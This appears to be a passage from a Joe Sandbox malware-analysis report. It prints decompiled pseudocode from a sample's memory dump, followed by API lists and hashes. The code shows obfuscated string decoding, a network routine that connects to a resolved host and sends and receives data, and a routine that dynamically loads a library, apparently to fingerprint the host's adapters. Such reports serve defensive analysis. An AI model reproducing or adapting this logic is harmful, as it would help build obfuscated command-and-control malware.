										_v8 = _t154;
										_t155 =  *0x3ce29c; // 0x38a60b65
										 *0x3ce2fc = _t155;
										_t156 =  *0x3d0460(_t328,  &_v1748, 0x400, 0);
										_t297 =  *0x3ce498; // 0x3a4fa324
										_v12 = _t297 + 0x205606c4;
										asm("fild dword [ebp-0x8]");
										_t328 = _t156;
										_v16 = _t383;
										_t384 =  *0x3ce360;
										asm("fsubr qword [ebp-0xc]");
										 *0x3ce2a0 = _t384;
										 *0x3ce498 =  *0x3ce498 + 1;
										__eflags = _t328;
										if(_t328 > 0) {
											while(1) {
												_t161 = E00386060(_v32, _v28);
												_t356 = _t356 + 8;
												__eflags = _t161;
												if(_t161 != 0) {
													goto L59;
												}
												E00391810(_t341, E0038CEE0(_t161) + _t328);
												_t165 = E00395940();
												__eflags = _t165;
												if(_t165 != 0) {
													_t166 = E00390A30(_t341,  &_v1748, _t328);
													__eflags = _t213;
													if(__eflags >= 0) {
														L50:
														_t328 = _v8;
														goto L51;
													} else {
														_t330 = E0038CF90(__eflags, _t384, 0x31be, 5);
														_t357 = _t356 + 8;
														 *0x3ce10c = ( *0x3ce10c & 0x0000ffff) * 0xc5a08226;
														_t175 = E0038E5A0(_t172, 0);
														_t213 = _t175;
														_v16 =  *0x3ce110 -  *0x3c8010;
														asm("fsubr qword [ebp-0xc]");
														_t384 =  *0x3c8008;
														asm("fucompp");
														asm("fnstsw ax");
														__eflags = _t175 & 0x00000044;
														if((_t175 & 0x00000044) == 0) {
															_t266 =  *0x3ce0c8; // 0x7101
															 *0x3ce598 = _t266;
														}
														_t166 = E00396570(5, _t330);
														_t356 = _t357 + 8;
														__eflags = _t213;
														if(__eflags < 0) {
															goto L50;
														} else {
															_t213 = _t213 + 4;
															_t166 = E00390330(__eflags, _t341);
															_t328 = _t166;
															_t356 = _t356 + 4;
															_v8 = _t328;
															__eflags = _t328;
															if(__eflags >= 0) {
																L51:
																_t300 =  *0x3ce37c; // 0x277c3928
																 *0x3ce37c = _t300 * 0x32eab1b4;
																__eflags = _t328;
																if(_t328 < 0) {
																	L53:
																	_v16 =  *0x3c8000 -  *0x3ce464;
																	asm("fucompp");
																	asm("fnstsw ax");
																	asm("fld1");
																	_t384 =  *0x3ce300 + st0;
																	asm("fxch st0, st1");
																	 *0x3ce300 = _t384;
																	__eflags = _t166 & 0x00000044;
																	if((_t166 & 0x00000044) != 0) {
																		st0 = _t384;
																	} else {
																		_t170 =  *0x3ce2d8; // 0xaffc
																		_v12 = _t170;
																		_t395 =  *0x3ce470 -  *0x3c7ff8 +  *0x3c7ff0;
																		_v68 = _t395;
																		asm("fild dword [ebp-0x8]");
																		_t384 = _t395 + _v68;
																		 *0x3ce2d8 = E0039CABC();
																		asm("fsubr qword [0x3ce470]");
																		 *0x3ce470 = _t384;
																	}
																	__eflags = _a16 - 0x3aa6;
																	if(_a16 != 0x3aa6) {
																		L58:
																		 *0x3ce29c =  *0x3ce29c - 1;
																		_t302 =  *0x3ce29c; // 0x38a60b65
																		 *0x3ce2fc = _t302;
																		_t168 =  *0x3d0460(_v20,  &_v1748, 0x400, 0);
																		_t303 =  *0x3ce498; // 0x3a4fa324
																		_v12 = _t303 + 0x205606c4;
																		asm("fild dword [ebp-0x8]");
																		_t328 = _t168;
																		_v68 = _t384;
																		_t384 =  *0x3ce360;
																		asm("fsubr qword [ebp-0x40]");
																		 *0x3ce2a0 = _t384;
																		 *0x3ce498 =  *0x3ce498 + 1;
																		__eflags = _t328;
																		if(_t328 > 0) {
																			continue;
																		}
																	} else {
																		_t169 = E0038CEE0(_t166);
																		__eflags = _t169 - 0x500000;
																		if(_t169 <= 0x500000) {
																			goto L58;
																		}
																	}
																} else {
																	_t166 = E0038CEE0(_t166) - _t213;
																	__eflags = _t166 - _t328;
																	if(_t166 < _t328) {
																		goto L53;
																	}
																}
															} else {
																_t328 = E0038CF90(__eflags, _t384, 0x1ac3, 0xb);
																_v12 = E0038E5A0(_t176, 0);
																_t166 = E00396570(0xb, _t176);
																_t356 = _t356 + 0x10;
																__eflags = _v12;
																if(_v12 < 0) {
																	goto L50;
																}
															}
														}
													}
												}
												goto L59;
											}
										}
										L59:
										 *0x3d04f0(_v20);
										__eflags = _t213;
										if(_t213 >= 0) {
											_t252 =  *0x3ce498; // 0x3a4fa324
											_v12 = _t252 - 0xe612128;
											asm("fild dword [ebp-0x8]");
											 *0x3ce560 = _t384;
											 *0x3ce498 =  *0x3ce498 - 1;
											__eflags =  *0x3ce498;
											E00396C10(_t341, 0, _t213);
										}
									}
									goto L61;
								}
							}
							return E00393030(_t244, _t328, _t341);
						} else {
							 *0x3ce10c = 0xffffed58;
							return E00393030( &_v60, _t328, _t341);
						}
					} else {
						return E00393030( &_v60, _t319, _t338);
					}
				} else {
					return E00393030( &_v60, _t318, __esi);
				}
			}

0x003992c0
0x003992c9
0x003992ce
0x003992d1
0x003992d5
0x003992ea
0x003992f2
0x003992f7
0x003992fd
0x00399302
0x00399304
0x0039930a
0x00399311
0x00399316
0x0039931e
0x00399321
0x00399323
0x00399326
0x00399329
0x00399330
0x00399330
0x00399333
0x00399333
0x00399335
0x00399336
0x0039933a
0x0039933f
0x0039934e
0x00399350
0x00399351
0x00399353
0x0039935d
0x0039935d
0x00399360
0x00399363
0x0039936a
0x00399371
0x00399374
0x0039937d
0x00399385
0x00399387
0x0039938b
0x00399398
0x0039939d
0x0039939d
0x00000000
0x00399387
0x00399376
0x00399377
0x00399379
0x00000000
0x00000000
0x0039937b
0x00000000
0x00399379
0x00399360
0x003993a0
0x003993a0
0x003993a6
0x003993a6
0x003993b0
0x003993b0
0x003993b2
0x003993b3
0x003993b3
0x003993b7
0x003993ba
0x003993bc
0x003993bc
0x003993be
0x003993be
0x003993c1
0x003993c1
0x003993c3
0x003993c4
0x003993c4
0x003993cc
0x003993d2
0x003993e2
0x003993e4
0x003993e6
0x003993e6
0x003993e8
0x003993e9
0x003993e9
0x003993f3
0x003993f5
0x003993f5
0x003993f6
0x003993f6
0x003993f9
0x003993fa
0x003993fa
0x00399400
0x0039940a
0x0039940c
0x0039941d
0x00399424
0x00399438
0x00399440
0x00399445
0x00399448
0x00399452
0x00399454
0x0039945a
0x00399460
0x0039946a
0x00399477
0x00399484
0x0039948f
0x00399494
0x00399497
0x0039949e
0x003994a3
0x003994a9
0x003994ac
0x003994af
0x003994b1
0x003994c9
0x003994cb
0x003994d3
0x003994d5
0x003994e3
0x003994e5
0x003994e7
0x003994e9
0x003994ef
0x003994f2
0x00399522
0x003994f4
0x00399500
0x00399506
0x0039950c
0x0039950e
0x00399514
0x0039951a
0x0039951a
0x00399527
0x0039952c
0x00399532
0x0039953f
0x00399542
0x00399545
0x00399548
0x00399551
0x00399554
0x0039955a
0x00399561
0x00399563
0x0039956a
0x00399571
0x0039958b
0x00399593
0x00399598
0x00399598
0x00399563
0x003995a7
0x003995ba
0x003995bd
0x003995c3
0x003995c6
0x003995c9
0x003995cf
0x003995e9
0x003995f1
0x003995f6
0x00399603
0x00399608
0x0039960c
0x00399625
0x00399639
0x00399645
0x0039966c
0x00399674
0x00399679
0x00399686
0x0039969d
0x0039969f
0x003996a1
0x003996a7
0x003996a9
0x003996ab
0x003996b1
0x003996b4
0x003996bd
0x003996bd
0x003996c3
0x003996c3
0x003996b4
0x003996df
0x003996e7
0x003996ec
0x003996ef
0x003996f3
0x003996f9
0x003996f9
0x0039970a
0x0039970c
0x0039970f
0x00399712
0x0039972f
0x00399733
0x00399746
0x0039974c
0x00399752
0x00399752
0x00399758
0x00399758
0x00399765
0x0039976b
0x00399772
0x00399782
0x0039978a
0x00399797
0x0039979a
0x003997a2
0x003997ac
0x003997af
0x003997b2
0x003997ba
0x003997c3
0x003997c6
0x003997c6
0x003997cc
0x003997ce
0x00399b76
0x00399b76
0x003997d4
0x003997d9
0x003997f2
0x003997f5
0x003997fc
0x00399806
0x0039980b
0x0039980e
0x00399817
0x0039981a
0x00399826
0x0039982c
0x00399839
0x0039983d
0x00399843
0x00399846
0x00399849
0x0039986a
0x0039986c
0x00399871
0x00399873
0x00399885
0x0039988b
0x00399894
0x00399897
0x003998a2
0x003998ad
0x003998b5
0x003998bb
0x003998c2
0x003998c5
0x003998c7
0x003998d8
0x003998db
0x003998e1
0x003998e7
0x003998ed
0x003998f9
0x003998fc
0x003998ff
0x00399901
0x00399904
0x0039990a
0x0039990d
0x00399913
0x00399919
0x0039991b
0x00399921
0x00399929
0x0039992e
0x00399931
0x00399933
0x00000000
0x00000000
0x00399945
0x0039994c
0x00399951
0x00399953
0x00399963
0x00399968
0x0039996a
0x00399a2c
0x00399a2c
0x00000000
0x00399970
0x0039997c
0x0039998b
0x00399990
0x00399999
0x0039999e
0x003999ac
0x003999b5
0x003999b8
0x003999be
0x003999c0
0x003999c2
0x003999c5
0x003999c7
0x003999ce
0x003999ce
0x003999d8
0x003999dd
0x003999e0
0x003999e2
0x00000000
0x003999e4
0x003999e5
0x003999e8
0x003999ed
0x003999ef
0x003999f2
0x003999f5
0x003999f7
0x00399a2f
0x00399a2f
0x00399a3b
0x00399a41
0x00399a43
0x00399a56
0x00399a62
0x00399a6e
0x00399a70
0x00399a78
0x00399a7a
0x00399a7c
0x00399a7e
0x00399a84
0x00399a87
0x00399ac9
0x00399a89
0x00399a8f
0x00399a9e
0x00399aa1
0x00399aa7
0x00399aaa
0x00399aad
0x00399ab5
0x00399abb
0x00399ac1
0x00399ac1
0x00399acb
0x00399ad2
0x00399ae2
0x00399ae2
0x00399aeb
0x00399aff
0x00399b06
0x00399b0c
0x00399b18
0x00399b1b
0x00399b1e
0x00399b20
0x00399b23
0x00399b29
0x00399b2c
0x00399b32
0x00399b38
0x00399b3a
0x00000000
0x00000000
0x00399ad4
0x00399ad6
0x00399adb
0x00399ae0
0x00000000
0x00000000
0x00399ae0
0x00399a45
0x00399a4c
0x00399a4e
0x00399a50
0x00000000
0x00000000
0x00399a50
0x003999f9
0x00399a08
0x00399a17
0x00399a1a
0x00399a1f
0x00399a22
0x00399a26
0x00000000
0x00000000
0x00399a26
0x003999f7
0x003999e2
0x0039996a
0x00000000
0x00399953
0x00399921
0x00399b40
0x00399b44
0x00399b4a
0x00399b4c
0x00399b4e
0x00399b5a
0x00399b5d
0x00399b65
0x00399b6b
0x00399b6b
0x00399b71
0x00399b71
0x00399b4c
0x00000000
0x00399873
0x00399849
0x00399b84
0x00399714
0x0039971c
0x0039972e
0x0039972e
0x003993d4
0x003993e1
0x003993e1
0x00399341
0x0039934d
0x0039934d

APIs

Part of subcall function 0039B950: __time64.LIBCMT ref: 0039B951

__snprintf.LIBCMT ref: 0039966C
socket.WS2_32(00000002,00000001,00000006), ref: 00399704
setsockopt.WS2_32(00000000,0000FFFF,00001006,00000000,00000004), ref: 00399746
gethostbyname.WS2_32(?), ref: 00399765
inet_ntoa.WS2_32(00000002), ref: 003997E5
inet_addr.WS2_32(00000000), ref: 003997EC
htons.WS2_32(00000050), ref: 0039982C
connect.WS2_32(00000000,?,00000010), ref: 0039983D
send.WS2_32(00000000,00000000,00000000,00000000), ref: 00399861
recv.WS2_32(00000000,?,00000400,00000000), ref: 003998E7
recv.WS2_32(?,?,00000400,00000000), ref: 00399B06

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

closesocket.WS2_32(?), ref: 00399B44

Strings

(9|', xrefs: 00399A2F, 00399A3B

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: recv$__snprintf__time64_mallocclosesocketconnectgethostbynamehtonsinet_addrinet_ntoasendsetsockoptsocket
String ID: (9|'
API String ID: 4060256917-1240991043
Opcode ID: 9151b2105d2aefda7bf3c3b52d11ab4ffe582be3f7fd2e13eace098782ff78e3
Instruction ID: 40af3d8a377b7c9385aa3ab8cd7d81c4e3505d8b622a634bbed5df32dded56e2
Opcode Fuzzy Hash: 9151b2105d2aefda7bf3c3b52d11ab4ffe582be3f7fd2e13eace098782ff78e3
Instruction Fuzzy Hash: 1532E171A00608EBEB06AFA4FC85FAD7B7CFF85300F114459E545EB2A1EB346A65CB50

Uniqueness

Uniqueness Score: -1.00%

Function 003923B0 Relevance: 16.9, APIs: 11, Instructions: 431
librarymemoryloaderCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E003923B0(signed int __fp0, intOrPtr _a4) {
				void* _v8;
				long _v12;
				void* _v16;
				struct HINSTANCE__* _v20;
				long _v24;
				long long _v28;
				signed char _v32;
				long long _v36;
				signed char _v40;
				signed int _v44;
				long long _v52;
				long long _v60;
				char _v80;
				char _v100;
				long _t91;
				signed char _t96;
				intOrPtr* _t97;
				void* _t99;
				void* _t108;
				intOrPtr* _t116;
				void* _t118;
				signed char _t119;
				signed char _t120;
				void* _t121;
				intOrPtr _t122;
				intOrPtr* _t124;
				short _t127;
				short _t128;
				unsigned int _t129;
				signed char _t130;
				void* _t136;
				intOrPtr _t143;
				void* _t147;
				char _t161;
				signed int _t162;
				signed int _t166;
				intOrPtr* _t171;
				intOrPtr* _t172;
				short _t173;
				intOrPtr _t175;
				intOrPtr* _t177;
				intOrPtr* _t179;
				intOrPtr _t182;
				void* _t189;
				intOrPtr _t193;
				void* _t194;
				void* _t195;
				signed long long _t198;
				void* _t199;
				void* _t201;
				void* _t207;
				void* _t208;
				long long _t211;
				struct HINSTANCE__* _t215;
				void* _t216;
				intOrPtr* _t223;
				void* _t228;
				void* _t231;
				signed int _t232;
				void* _t233;
				void* _t239;
				signed int _t259;
				signed int _t262;
				long long _t271;
				long long _t273;
				intOrPtr _t285;

				_t91 =  *0x3ce4c4; // 0x6429
				_v24 = _t91;
				asm("fild dword [ebp-0x14]");
				_v44 = __fp0;
				_t259 =  *0x3ce568 + _v44;
				 *0x3ce4c4 = E0039CABC();
				 *0x3ce2c4 = ( *0x3ce2c4 & 0x0000ffff) - ( *0x3ce558 & 0x0000ffff) + 0x579a5650;
				 *0x3ce318 =  *0x3ce318 - 1;
				_v24 = 0;
				_t251 = ( *0x3ce318 & 0x0000ffff) + ( *0x3ce4a8 & 0x0000ffff) - 0xfd9c7e54;
				if(( *0x3ce318 & 0x0000ffff) + ( *0x3ce4a8 & 0x0000ffff) != 0xfd9c7e54) {
					_t259 =  *0x3ce3b4 +  *0x3c7850;
					 *0x3ce3b4 = _t259;
				}
				_t223 = E0038CF90(_t251, _t259, 0x3038, 0xe);
				_t96 =  *0x3ce1d0; // 0x2f751c97
				_v20 = 0x1f4bf161 - _t96;
				asm("fild dword [ebp-0x10]");
				_v44 = _t259;
				 *0x3ce1d0 =  *0x3ce1d0 + 1;
				_t262 = _v44;
				asm("fucompp");
				asm("fnstsw ax");
				if((_t96 & 0x00000044) == 0) {
					 *0x3ce524 = ( *0x3ce524 & 0x0000ffff) + 0x101fdd13;
				}
				_t97 = _t223;
				_t189 = _a4 - _t223;
				do {
					_t161 =  *_t97;
					 *((char*)(_t189 + _t97)) = _t161;
					_t97 = _t97 + 1;
				} while (_t161 != 0);
				E00396570(0xe, _t223);
				_t99 = GetProcessHeap();
				_t162 =  *0x3ce264; // 0x80000000
				_v16 = _t99;
				 *0x3ce264 = _t162 * 0x73196110;
				if(_t99 != 0) {
					_t215 = LoadLibraryA(E0038CF90(__eflags, _t262, 0x1f, 0xd));
					_v20 = _t215;
					E00396570(0xd, _t100);
					__eflags = _t215;
					if(__eflags != 0) {
						_t147 = GetProcAddress(_t215, E0038CF90(__eflags, _t262, 0x39ff, 0x10));
						E00396570(0x10, _t103);
						__eflags = _t147;
						if(_t147 != 0) {
							_v12 = 0x288;
							_t216 = HeapAlloc(_v16, 0, 0x288);
							_v8 = _t216;
							__eflags = _t216;
							if(_t216 != 0) {
								_t108 =  *_t147(_t216,  &_v12);
								_v44 =  *0x3ce20c +  *0x3c7848;
								_t266 =  *0x3ce2a8 * _v44;
								 *0x3ce2a8 =  *0x3ce2a8 * _v44;
								__eflags = _t108 - 0x6f;
								if(_t108 != 0x6f) {
									L18:
									__eflags =  *_t147(_t216,  &_v12);
									if(__eflags != 0) {
										L56:
										__eflags = _t216;
										if(_t216 != 0) {
											HeapFree(_v16, 0, _t216);
										}
									} else {
										_t166 =  *0x3ce610; // 0x7e9f9aaf
										 *0x3ce610 = _t166 * (( *0x3ce020 & 0x0000ffff) + 0xae9efa3c);
										_t116 = E0038CF90(__eflags, _t266, 0x3703, 8);
										 *0x3ce390 =  *0x3ce390 - 1;
										_t193 =  *0x3ce390; // 0xcd6d4fea
										 *0x3ce5d4 = ( *0x3ce5d4 & 0x0000ffff) - _t193 - 0x1401b11;
										_t171 = _t116;
										_t228 =  &_v80 - _t116;
										__eflags = _t228;
										do {
											_t194 =  *_t171;
											 *((char*)(_t228 + _t171)) = _t194;
											_t171 = _t171 + 1;
											__eflags = _t194;
										} while (_t194 != 0);
										_v44 =  *0x3ce314;
										_t271 =  *0x3ce2d0 + _v44 +  *0x3c7840;
										asm("fsubp st1, st0");
										 *0x3ce548 = _t271;
										E00396570(8, _t116);
										__eflags = _v8;
										if(_v8 != 0) {
											do {
												_t172 =  &_v80;
												_t37 = _t216 + 0x1d8; // 0x1d8
												_t118 = _t37;
												while(1) {
													_t195 =  *_t118;
													__eflags = _t195 -  *_t172;
													if(_t195 !=  *_t172) {
														break;
													}
													__eflags = _t195;
													if(_t195 == 0) {
														L28:
														_t118 = 0;
													} else {
														_t208 =  *((intOrPtr*)(_t118 + 1));
														__eflags = _t208 -  *((intOrPtr*)(_t172 + 1));
														if(_t208 !=  *((intOrPtr*)(_t172 + 1))) {
															break;
														} else {
															_t118 = _t118 + 2;
															_t172 = _t172 + 2;
															__eflags = _t208;
															if(_t208 != 0) {
																continue;
															} else {
																goto L28;
															}
														}
													}
													L30:
													__eflags = _t118;
													if(_t118 == 0) {
														L41:
														_t173 =  *0x3ce108; // 0x5dc4
														_t216 =  *_t216;
														_v32 = _t173 + 0x792b8a3e;
														asm("fild dword [ebp-0x1c]");
														_v60 = _t271;
														_t119 =  *0x3ce0bc; // 0xdec
														_t273 =  *0x3ce070 -  *0x3c783c;
														 *0x3ce0bc =  *0x3ce0bc - 1;
														 *0x3ce108 =  *0x3ce108 + 1;
														_v52 = _t273;
														_v32 = _t119;
														asm("fild dword [ebp-0x1c]");
														_t271 = _t273 + _v52;
														asm("fcomp qword [ebp-0x38]");
														asm("fnstsw ax");
														__eflags = _t119 & 0x00000005;
														if((_t119 & 0x00000005) == 0) {
															 *0x3ce380 =  *0x3ce380 -  *0x3c75c8;
															_t198 =  *0x3ce380; // 0x1cc00000
															_t120 =  *0x3ce384; // 0xc1e13e71
															_t271 =  *0x3ce50c;
															_t175 =  *0x3ce0f0; // 0xfafdf6a6
															_v40 = _t120;
															_v44 = _t198;
															asm("fsubr qword [ebp-0x28]");
															_v32 = _t175 - 0x725c3b33;
															_v60 = _t271;
															asm("fild dword [ebp-0x1c]");
															asm("fcomp qword [ebp-0x38]");
															asm("fnstsw ax");
															__eflags = _t120 & 0x00000041;
															if((_t120 & 0x00000041) != 0) {
																 *0x3ce590 = 0x4d08d8b2;
															}
														}
														goto L44;
													} else {
														_t177 =  &_v80;
														_t41 = _t216 + 0x1b0; // 0x1b0
														_t121 = _t41;
														while(1) {
															_t199 =  *_t121;
															__eflags = _t199 -  *_t177;
															if(_t199 !=  *_t177) {
																break;
															}
															__eflags = _t199;
															if(_t199 == 0) {
																L36:
																_t121 = 0;
															} else {
																_t207 =  *((intOrPtr*)(_t121 + 1));
																__eflags = _t207 -  *((intOrPtr*)(_t177 + 1));
																if(_t207 !=  *((intOrPtr*)(_t177 + 1))) {
																	break;
																} else {
																	_t121 = _t121 + 2;
																	_t177 = _t177 + 2;
																	__eflags = _t207;
																	if(_t207 != 0) {
																		continue;
																	} else {
																		goto L36;
																	}
																}
															}
															L38:
															__eflags = _t121;
															if(_t121 == 0) {
																goto L41;
															} else {
																 *0x3ce060 =  *0x3ce060 - 1;
																_t122 =  *0x3ce060; // 0x54bf
																 *0x3ce5dc = ( *0x3ce5dc & 0x0000ffff) + _t122 - 0x70116dad;
																__eflags =  *(_t216 + 0x190) - 8;
																if(__eflags <= 0) {
																	_t124 = E0038CF90(__eflags, _t271, 0xe14, 0x11);
																	_t179 = _t124;
																	_t231 =  &_v100 - _t124;
																	__eflags = _t231;
																	do {
																		_t201 =  *_t179;
																		 *((char*)(_t231 + _t179)) = _t201;
																		_t179 = _t179 + 1;
																		__eflags = _t201;
																	} while (_t201 != 0);
																	E00396570(0x11, _t124);
																	_t232 = 0;
																	 *0x3ce170 =  *0x3ce170 +  *0x3c7838;
																	__eflags =  *(_t216 + 0x190);
																	if( *(_t216 + 0x190) != 0) {
																		asm("fld1");
																		do {
																			 *0x3ce284 = 0xffffdd06;
																			_v60 =  *0x3ce1a8 + st1;
																			_t127 =  *0x3ce5a8; // 0x6c7a
																			_v32 = _t127;
																			_v60 =  *0x3ce5e4 + _v60;
																			asm("fild dword [ebp-0x1c]");
																			_t128 = E0039CABC();
																			_t182 = _a4;
																			 *0x3ce5a8 = _t128;
																			_t129 =  *(_t216 + _t232 + 0x194) & 0x000000ff;
																			_t130 = _t129 & 0x8000000f;
																			__eflags = _t130;
																			 *0x3ce1a8 =  *0x3ce1a8 + st2;
																			 *((char*)(_t182 + _t232 * 2)) =  *(_t239 + (_t129 >> 4) - 0x60) & 0x000000ff;
																			if(_t130 < 0) {
																				_t130 = (_t130 - 0x00000001 | 0xfffffff0) + 1;
																				__eflags = _t130;
																			}
																			 *((char*)(_t182 + 1 + _t232 * 2)) =  *(_t239 + (_t130 & 0x000000ff) - 0x60) & 0x000000ff;
																			_t232 = _t232 + 1;
																			_v60 =  *0x3ce130;
																			_t285 =  *0x3ce0ac;
																			asm("fsubr qword [ebp-0x38]");
																			 *0x3ce130 = _t285;
																			__eflags = _t232 -  *(_t216 + 0x190);
																		} while (_t232 !=  *(_t216 + 0x190));
																		st1 = _t285;
																		st0 = _t285;
																	}
																	 *((char*)(_a4 +  *(_t216 + 0x190) * 2)) = 0;
																	_v24 = 1;
																} else {
																	 *0x3ce55c = 0xffff80e0;
																	goto L44;
																}
															}
															goto L55;
														}
														asm("sbb eax, eax");
														asm("sbb eax, 0xffffffff");
														goto L38;
													}
													L55:
													_t216 = _v8;
													goto L56;
												}
												asm("sbb eax, eax");
												asm("sbb eax, 0xffffffff");
												goto L30;
												L44:
												__eflags = _t216;
											} while (_t216 != 0);
											goto L55;
										}
									}
									FreeLibrary(_v20);
									return _v24;
								} else {
									_t233 = _v16;
									HeapFree(_t233, 0, _t216);
									_t136 = HeapAlloc(_t233, 0, _v12);
									_v8 = _t136;
									__eflags = _t136;
									if(_t136 != 0) {
										_t216 = _t136;
										goto L18;
									} else {
										 *0x3ce4b8 = 0xffffeb7f;
										FreeLibrary(_v20);
										__eflags = 0;
										return 0;
									}
								}
							} else {
								FreeLibrary(_v20);
								__eflags = 0;
								return 0;
							}
						} else {
							FreeLibrary(_t215);
							 *0x3ce088 =  *0x3ce088 -  *0x3c75c8;
							_t211 =  *0x3ce088; // 0x8f400000
							_t143 =  *0x3ce08c; // 0xc1de0b20
							_v28 =  *0x3ce5b0;
							_v32 = _t143;
							_v36 = _t211;
							__eflags = 0;
							_v44 =  *0x3ce470 + _v36;
							asm("fsubr qword [ebp-0x28]");
							asm("fsubr qword [ebp-0x18]");
							 *0x3ce5b0 =  *0x3ce5ac;
							return 0;
						}
					} else {
						__eflags = 0;
						return 0;
					}
				} else {
					return _t99;
				}
			}

0x003923b6
0x003923bf
0x003923c2
0x003923c5
0x003923ce
0x003923d6
0x003923f5
0x0039240a
0x00392419
0x00392420
0x00392426
0x0039242e
0x00392434
0x00392434
0x00392447
0x00392449
0x00392455
0x00392458
0x0039245e
0x00392467
0x00392473
0x00392476
0x00392478
0x0039247d
0x0039248c
0x0039248c
0x00392496
0x00392498
0x003924a0
0x003924a0
0x003924a2
0x003924a5
0x003924a6
0x003924ad
0x003924b5
0x003924bb
0x003924c7
0x003924ca
0x003924d2
0x003924ef
0x003924f4
0x003924f7
0x003924ff
0x00392501
0x00392528
0x0039252a
0x00392532
0x00392534
0x0039259b
0x003925a8
0x003925aa
0x003925ad
0x003925af
0x003925c9
0x003925d7
0x003925e0
0x003925e3
0x003925e9
0x003925ec
0x00392630
0x00392637
0x00392639
0x0039295f
0x0039295f
0x00392961
0x0039296a
0x0039296a
0x0039263f
0x00392646
0x0039265d
0x00392668
0x0039266d
0x0039267d
0x00392691
0x00392698
0x0039269a
0x0039269a
0x003926a0
0x003926a0
0x003926a2
0x003926a5
0x003926a6
0x003926a6
0x003926b1
0x003926c4
0x003926ca
0x003926cc
0x003926d2
0x003926da
0x003926de
0x003926f0
0x003926f0
0x003926f3
0x003926f3
0x00392700
0x00392700
0x00392702
0x00392704
0x00000000
0x00000000
0x00392706
0x00392708
0x0039271c
0x0039271c
0x0039270a
0x0039270a
0x0039270d
0x00392710
0x00000000
0x00392712
0x00392712
0x00392715
0x00392718
0x0039271a
0x00000000
0x00000000
0x00000000
0x00000000
0x0039271a
0x00392710
0x00392725
0x00392725
0x00392727
0x0039279a
0x0039279a
0x003927a4
0x003927ac
0x003927af
0x003927b2
0x003927bb
0x003927c1
0x003927c7
0x003927ce
0x003927d8
0x003927db
0x003927de
0x003927e1
0x003927e4
0x003927e7
0x003927e9
0x003927ec
0x003927fa
0x00392800
0x00392806
0x0039280b
0x00392811
0x00392817
0x0039281a
0x0039281d
0x00392826
0x00392829
0x0039282c
0x0039282f
0x00392832
0x00392834
0x00392837
0x00392839
0x00392839
0x00392837
0x00000000
0x00392729
0x00392729
0x0039272c
0x0039272c
0x00392732
0x00392732
0x00392734
0x00392736
0x00000000
0x00000000
0x00392738
0x0039273a
0x0039274e
0x0039274e
0x0039273c
0x0039273c
0x0039273f
0x00392742
0x00000000
0x00392744
0x00392744
0x00392747
0x0039274a
0x0039274c
0x00000000
0x00000000
0x00000000
0x00000000
0x0039274c
0x00392742
0x00392757
0x00392757
0x00392759
0x00000000
0x0039275b
0x0039275b
0x00392762
0x00392777
0x0039277e
0x00392784
0x00392853
0x0039285e
0x00392860
0x00392860
0x00392862
0x00392862
0x00392864
0x00392867
0x00392868
0x00392868
0x0039286f
0x00392880
0x00392885
0x0039288b
0x00392891
0x00392897
0x0039289f
0x003928a4
0x003928ba
0x003928c3
0x003928cf
0x003928d2
0x003928d5
0x003928db
0x003928e0
0x003928e3
0x003928ef
0x003928f9
0x003928f9
0x003928fe
0x00392909
0x0039290c
0x00392912
0x00392912
0x00392912
0x0039291b
0x0039291f
0x00392926
0x00392929
0x0039292f
0x00392932
0x00392938
0x00392938
0x00392944
0x00392946
0x00392946
0x00392951
0x00392955
0x0039278a
0x0039278f
0x00000000
0x0039278f
0x00392784
0x00000000
0x00392759
0x00392752
0x00392754
0x00000000
0x00392754
0x0039295c
0x0039295c
0x00000000
0x0039295c
0x00392720
0x00392722
0x00000000
0x0039283f
0x0039283f
0x0039283f
0x00000000
0x00392847
0x003926de
0x00392974
0x00392983
0x003925ee
0x003925ee
0x003925f5
0x00392602
0x00392608
0x0039260b
0x0039260d
0x0039262e
0x00000000
0x0039260f
0x00392618
0x0039261f
0x00392627
0x0039262d
0x0039262d
0x0039260d
0x003925b1
0x003925b5
0x003925bd
0x003925c3
0x003925c3
0x00392536
0x00392537
0x0039254c
0x00392558
0x0039255e
0x00392563
0x0039256c
0x0039256f
0x00392575
0x00392577
0x00392580
0x00392583
0x00392586
0x0039258f
0x0039258f
0x00392503
0x00392504
0x0039250a
0x0039250a
0x003924d4
0x003924d8
0x003924d8

APIs

GetProcessHeap.KERNEL32(?,?,?,?), ref: 003924B5

Part of subcall function 0038CF90: _malloc.LIBCMT ref: 0038CFC7

LoadLibraryA.KERNEL32(00000000,?,?,?,?,?,?), ref: 003924E9

Part of subcall function 00396570: _memset.LIBCMT ref: 00396593
Part of subcall function 00396570: _free.LIBCMT ref: 00396599

GetProcAddress.KERNEL32(00000000,00000000), ref: 0039251F
FreeLibrary.KERNEL32(00000000,?,?,?,74CB4EE0,?,?,?,?,?,?,?,?), ref: 00392537

Memory Dump Source

Source File: 00000000.00000002.376906560.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true

Associated: 00000000.00000002.376889166.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377032903.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377073242.00000000003CE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.377090053.00000000003D3000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_380000_zGIDlWIotR.jbxd

Similarity

API ID: Library$AddressFreeHeapLoadProcProcess_free_malloc_memset
String ID:
API String ID: 3762248333-0
Opcode ID: e7e9dd5cfa365ccfdac0556f00dfd1a4f43d0f24ea7da7e881d33ba5c5cdc1b7
Instruction ID: 7794b8198b26a8b2c90b0d2c4cd9ebaeaf4267c4664e066d565cb595c2ec54dd
Opcode Fuzzy Hash: e7e9dd5cfa365ccfdac0556f00dfd1a4f43d0f24ea7da7e881d33ba5c5cdc1b7
